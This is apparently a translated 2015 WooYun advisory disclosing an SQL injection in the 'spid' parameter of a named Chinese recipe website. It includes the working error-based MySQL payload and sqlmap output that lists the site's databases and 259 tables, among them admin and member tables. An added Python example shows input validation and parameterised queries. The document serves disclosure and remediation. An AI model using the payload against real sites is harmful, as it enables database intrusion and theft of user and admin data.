Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0132287

Vulnerability title: SQL injection in one feature of the 中国菜谱网 main site

Related vendor: CNCERT (National Internet Emergency Center)

Vulnerability author: 路人甲

Submitted: 2015-08-13 21:11

Fixed: 2015-09-28 11:24

Published: 2015-09-28 11:24

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-13: Details sent to the vendor; awaiting vendor handling
2015-08-14: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible unit; details disclosed only to the notifying agency
2015-08-24: Details disclosed to core white hats and relevant domain experts
2015-09-03: Details disclosed to regular white hats
2015-09-13: Details disclosed to intern white hats
2015-09-28: Details disclosed to the public

Brief description:

Data leakage, or compromise of other sites hosted alongside this one

Detailed description:

Proof of vulnerability:

---
Parameter: spid (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload: spid=(SELECT 6583 FROM(SELECT COUNT(*),CONCAT(0x71786a6271,(SELECT (ELT(6583=6583,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[05:40:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
available databases [3]:
[*] caipu
[*] information_schema
[*] test
Database: caipu
[259 tables]
+-----------------------------+
| admin_action |
| admin_group |
| admin_group_action |
| admin_log |
| admin_login_record |
| admin_user |
| admin_user_group |
| cp_caipu_attention |
| cp_caipu_collection |
| cp_caipu_data |
| cp_caipu_fans |
| cp_caipu_message |
| cp_caipu_message_info |
| cp_caipu_sp |
| cp_caipu_spinfo |
| cp_ecms_article |
| cp_ecms_article_check |
| cp_ecms_article_check_data |
| cp_ecms_article_data_1 |
| cp_ecms_article_doc |
| cp_ecms_article_doc_data |
| cp_ecms_article_doc_index |
| cp_ecms_article_index |
| cp_ecms_download |
| cp_ecms_download_check |
| cp_ecms_download_check_data |
| cp_ecms_download_data_1 |
| cp_ecms_download_doc |
| cp_ecms_download_doc_data |
| cp_ecms_download_doc_index |
| cp_ecms_download_index |
| cp_ecms_flash |
| cp_ecms_flash_check |
| cp_ecms_flash_check_data |
| cp_ecms_flash_data_1 |
| cp_ecms_flash_doc |
| cp_ecms_flash_doc_data |
| cp_ecms_flash_doc_index |
| cp_ecms_flash_index |
| cp_ecms_info |
| cp_ecms_info_check |
| cp_ecms_info_check_data |
| cp_ecms_info_data_1 |
| cp_ecms_info_doc |
| cp_ecms_info_doc_data |
| cp_ecms_info_doc_index |
| cp_ecms_info_index |
| cp_ecms_infoclass_article |
| cp_ecms_infoclass_download |
| cp_ecms_infoclass_flash |
| cp_ecms_infoclass_info |
| cp_ecms_infoclass_movie |
| cp_ecms_infoclass_news |
| cp_ecms_infoclass_photo |
| cp_ecms_infoclass_shop |
| cp_ecms_infotmp_article |
| cp_ecms_infotmp_download |
| cp_ecms_infotmp_flash |
| cp_ecms_infotmp_info |
| cp_ecms_infotmp_movie |
| cp_ecms_infotmp_news |
| cp_ecms_infotmp_photo |
| cp_ecms_infotmp_shop |
| cp_ecms_movie |
| cp_ecms_movie_check |
| cp_ecms_movie_check_data |
| cp_ecms_movie_data_1 |
| cp_ecms_movie_doc |
| cp_ecms_movie_doc_data |
| cp_ecms_movie_doc_index |
| cp_ecms_movie_index |
| cp_ecms_news |
| cp_ecms_news_check |
| cp_ecms_news_check_data |
| cp_ecms_news_click |
| cp_ecms_news_data_1 |
| cp_ecms_news_doc |
| cp_ecms_news_doc_data |
| cp_ecms_news_doc_index |
| cp_ecms_news_index |
| cp_ecms_news_yygs |
| cp_ecms_photo |
| cp_ecms_photo_check |
| cp_ecms_photo_check_data |
| cp_ecms_photo_data_1 |
| cp_ecms_photo_doc |
| cp_ecms_photo_doc_data |
| cp_ecms_photo_doc_index |
| cp_ecms_photo_index |
| cp_ecms_shop |
| cp_ecms_shop_check |
| cp_ecms_shop_check_data |
| cp_ecms_shop_data_1 |
| cp_ecms_shop_doc |
| cp_ecms_shop_doc_data |
| cp_ecms_shop_doc_index |
| cp_ecms_shop_index |
| cp_ecms_xgwz |
| cp_enewsad |
| cp_enewsadclass |
| cp_enewsadminstyle |
| cp_enewsbefrom |
| cp_enewsbq |
| cp_enewsbqclass |
| cp_enewsbqtemp |
| cp_enewsbqtempclass |
| cp_enewsbuybak |
| cp_enewsbuygroup |
| cp_enewscard |
| cp_enewsclass |
| cp_enewsclass_stats |
| cp_enewsclass_stats_ip |
| cp_enewsclass_stats_set |
| cp_enewsclassadd |
| cp_enewsclassf |
| cp_enewsclassnavcache |
| cp_enewsclasstemp |
| cp_enewsclasstempclass |
| cp_enewsdiggips |
| cp_enewsdo |
| cp_enewsdolog |
| cp_enewsdownerror |
| cp_enewsdownrecord |
| cp_enewsdownurlqz |
| cp_enewserrorclass |
| cp_enewsf |
| cp_enewsfava |
| cp_enewsfavaclass |
| cp_enewsfeedback |
| cp_enewsfeedbackclass |
| cp_enewsfeedbackf |
| cp_enewsfile |
| cp_enewsfile_1 |
| cp_enewsfile_member |
| cp_enewsfile_other |
| cp_enewsfile_public |
| cp_enewsgbook |
| cp_enewsgbookclass |
| cp_enewsgfenip |
| cp_enewsgroup |
| cp_enewshmsg |
| cp_enewshnotice |
| cp_enewshy |
| cp_enewshyclass |
| cp_enewsindexpage |
| cp_enewsinfoclass |
| cp_enewsinfotype |
| cp_enewsinfovote |
| cp_enewsjstemp |
| cp_enewsjstempclass |
| cp_enewskey |
| cp_enewskeyclass |
| cp_enewslink |
| cp_enewslinkclass |
| cp_enewslinktmp |
| cp_enewslisttemp |
| cp_enewslisttempclass |
| cp_enewslog |
| cp_enewsloginfail |
| cp_enewsmember |
| cp_enewsmember_connect |
| cp_enewsmember_connect_app |
| cp_enewsmemberadd |
| cp_enewsmemberf |
| cp_enewsmemberfeedback |
| cp_enewsmemberform |
| cp_enewsmembergbook |
| cp_enewsmembergroup |
| cp_enewsmemberpub |
| cp_enewsmenu |
| cp_enewsmenuclass |
| cp_enewsmod |
| cp_enewsnewstemp |
| cp_enewsnewstempclass |
| cp_enewsnotcj |
| cp_enewsnotice |
| cp_enewspage |
| cp_enewspageclass |
| cp_enewspagetemp |
| cp_enewspayapi |
| cp_enewspayrecord |
| cp_enewspic |
| cp_enewspicclass |
| cp_enewspl |
| cp_enewspl_1 |
| cp_enewspl_data_1 |
| cp_enewspl_set |
| cp_enewsplayer |
| cp_enewsplf |
| cp_enewspltemp |
| cp_enewspostdata |
| cp_enewspostserver |
| cp_enewsprinttemp |
| cp_enewspublic |
| cp_enewspublic_update |
| cp_enewspubtemp |
| cp_enewspubvar |
| cp_enewspubvarclass |
| cp_enewsqmsg |
| cp_enewssearch |
| cp_enewssearchall |
| cp_enewssearchall_load |
| cp_enewssearchtemp |
| cp_enewssearchtempclass |
| cp_enewsshop_address |
| cp_enewsshop_ddlog |
| cp_enewsshop_precode |
| cp_enewsshop_set |
| cp_enewsshopdd |
| cp_enewsshopdd_add |
| cp_enewsshoppayfs |
| cp_enewsshopps |
| cp_enewssp |
| cp_enewssp_1 |
| cp_enewssp_2 |
| cp_enewssp_3 |
| cp_enewssp_3_bak |
| cp_enewsspacestyle |
| cp_enewsspclass |
| cp_enewssql |
| cp_enewstable |
| cp_enewstags |
| cp_enewstagsclass |
| cp_enewstagsdata |
| cp_enewstask |
| cp_enewstempbak |
| cp_enewstempdt |
| cp_enewstempgroup |
| cp_enewstempvar |
| cp_enewstempvarclass |
| cp_enewstogzts |
| cp_enewsuser |
| cp_enewsuseradd |
| cp_enewsuserclass |
| cp_enewsuserjs |
| cp_enewsuserjsclass |
| cp_enewsuserlist |
| cp_enewsuserlistclass |
| cp_enewsuserloginck |
| cp_enewsvote |
| cp_enewsvotemod |
| cp_enewsvotetemp |
| cp_enewswapstyle |
| cp_enewswfinfo |
| cp_enewswfinfolog |
| cp_enewswords |
| cp_enewsworkflow |
| cp_enewsworkflowitem |
| cp_enewswriter |
| cp_enewsyh |
| cp_enewszt |
| cp_enewsztadd |
| cp_enewsztclass |
| cp_enewsztf |
| cp_enewsztinfo |
| cp_enewszttype |
| cp_enewszttypeadd |
| cp_user |
| cp_userinfo |
+-----------------------------+

Fix recommendation:

Filter the input.
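What "filter the input" means in practice for an integer id such as spid: validate the parameter against an allow-list before it reaches the database, and pass it to the query as a bound parameter rather than by string concatenation. The following is an added example written for this page, not code from the site, from EmpireCMS or from the report author. It uses an in-memory SQLite database as a stand-in for the site's MySQL instance; the table name cp_caipu_sp comes from the sqlmap listing above, but its columns and rows are constructed for the example, and the handler function names are hypothetical. The vulnerable concatenation is shown next to the hardened version so the difference in behaviour is visible on the same input.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the site's MySQL database. The table name
# cp_caipu_sp is taken from the sqlmap listing on the page; its columns and the
# rows below are assumptions made up for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cp_caipu_sp (spid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO cp_caipu_sp (spid, title) VALUES (?, ?)",
        [(1, "tofu"), (2, "noodles"), (6583, "dumplings")],
    )
    return conn


# The error-based payload reported on the page for the spid parameter, used
# here only as a sample of hostile input that the validator must reject.
PAGE_PAYLOAD = (
    "(SELECT 6583 FROM(SELECT COUNT(*),CONCAT(0x71786a6271,(SELECT "
    "(ELT(6583=6583,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM "
    "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
)

# Allow-list: a recipe id is a positive integer of at most ten digits.
SPID_RE = re.compile(r"[1-9][0-9]{0,9}")


def validate_spid(raw):
    """Return spid as an int, or None if it is not a plain positive integer."""
    if not isinstance(raw, str) or SPID_RE.fullmatch(raw) is None:
        return None
    return int(raw)


def lookup_sp_unsafe(conn, raw_spid):
    """The vulnerable pattern: the query is built by concatenation, so the
    request parameter is parsed as SQL instead of being treated as a value."""
    query = "SELECT spid, title FROM cp_caipu_sp WHERE spid = " + raw_spid
    return conn.execute(query).fetchall()


def lookup_sp_safe(conn, raw_spid):
    """Hardened handler: validate first, then bind the value as a parameter.
    Returns the matching rows, or None when the input is rejected (the web
    layer would answer 400 Bad Request in that case)."""
    spid = validate_spid(raw_spid)
    if spid is None:
        return None
    cur = conn.execute(
        "SELECT spid, title FROM cp_caipu_sp WHERE spid = ?", (spid,)
    )
    return cur.fetchall()


if __name__ == "__main__":
    db = make_db()
    # The textbook tautology makes the concatenated query return every row.
    print("unsafe, '1 OR 1=1':  ", lookup_sp_unsafe(db, "1 OR 1=1"))
    print("safe,   '6583':      ", lookup_sp_safe(db, "6583"))
    print("safe,   '1 OR 1=1':  ", lookup_sp_safe(db, "1 OR 1=1"))
    print("safe,   page payload:", lookup_sp_safe(db, PAGE_PAYLOAD))
```

The allow-list check alone already stops the payload from the report, since it is not a run of digits; the bound parameter is the second, independent layer, so that even a value that slips past validation is sent to the server as data and never spliced into the statement text. The same two steps apply to every id-style parameter in the application, not only spid.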

Copyright notice: when republishing, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-14 11:23

Vendor reply:

CNVD has confirmed the reported vulnerability. No direct handling channel with the software vendor (or the website's operating unit) has been established yet; awaiting claim.

Latest status:

None yet